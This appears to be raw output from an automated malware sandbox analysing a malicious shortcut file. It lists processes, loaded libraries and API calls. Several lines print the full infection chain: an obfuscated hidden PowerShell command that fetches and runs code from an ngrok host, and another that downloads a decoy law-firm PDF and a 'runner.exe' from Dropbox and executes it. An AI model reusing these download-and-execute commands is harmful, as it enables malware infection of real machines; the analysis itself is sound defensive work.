                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00419CF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,29_2_00419CF0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00419D90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,CloseHandle,29_2_00419D90
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00463750 GetDiskFreeSpaceW,26_2_00463750
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004197C0 LoadBitmapW,CoInitialize,CoCreateInstance,CoUninitialize,CoSetProxyBlanket,CoUninitialize,CoUninitialize,VariantInit,VariantClear,VariantClear,VariantClear,CoUninitialize,26_2_004197C0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0041B4B0 OpenSCManagerW,OpenServiceW,CloseServiceHandle,QueryServiceStatus,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceW,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,26_2_0041B4B0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7376
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-b96944b1-fc36-a7801a-f3dda4a79090}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8544:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nd5bi5pb.tas.ps1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" "
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                      Source: 751ietQPnX.lnkReversingLabs: Detection: 18%
                      Source: 854113748.exeString found in binary or memory: -InstallNative
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1976,i,479339844209240994,6957522588551196104,262144 /prefetch:3
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6340 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6528 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7120 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1027599800.pdf
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=2128,i,4843216233513846130,16606171289243587075,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=3404 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8376 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:6
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1108 --field-trial-handle=1948,i,14212657581130048292,735076137658541707,262144 /prefetch:3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\854113748.exe "C:\Users\user\AppData\Local\Temp\854113748.exe"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1996,i,241946409549104947,2634262981403856413,262144 /prefetch:3
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Users\user\AppData\Local\Temp\854113748.exe "C:\Users\user\AppData\Local\Temp\854113748.exe"
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 444
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7376 -s 148
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6708 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" "
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1976,i,479339844209240994,6957522588551196104,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6340 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6528 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: msimg32.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: k7rn7l32.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: ntd3ll.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: 751ietQPnX.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2278426840.000002336DB4B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000010.00000002.2282838688.0000023B6EE9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: 854113748.exe, 0000001D.00000003.2340149595.0000000000F20000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340267249.0000000002E50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345418878.0000000005710000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345179644.00000000039C0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: 854113748.exe, 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340562486.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb= source: powershell.exe, 00000010.00000002.2278426840.000002336DB5F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: 854113748.exe, 0000001D.00000003.2339382233.0000000002FC0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339181691.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000010.00000002.2277453926.000002336DB34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: 854113748.exe, 0000001D.00000003.2339895618.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339702134.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344912074.0000000005830000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344721421.0000000005690000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb`Il source: 854113748.exe, 0000001A.00000000.2141718264.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371490999.0000000002420000.00000004.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                      Source: Binary string: ntdll.pdbUGP source: 854113748.exe, 0000001D.00000003.2339382233.0000000002FC0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339181691.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: 854113748.exe, 0000001D.00000003.2339895618.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339702134.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344912074.0000000005830000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344721421.0000000005690000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2283522545.0000023B6EF5E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: b.pdb source: powershell.exe, 00000010.00000002.2283522545.0000023B6EF5E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: 854113748.exe, 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340562486.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: 854113748.exe, 0000001D.00000003.2340149595.0000000000F20000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340267249.0000000002E50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345418878.0000000005710000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345179644.00000000039C0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbSv"P source: powershell.exe, 00000010.00000002.2283522545.0000023B6EF5E000.00000004.00000020.00020000.00000000.sdmp
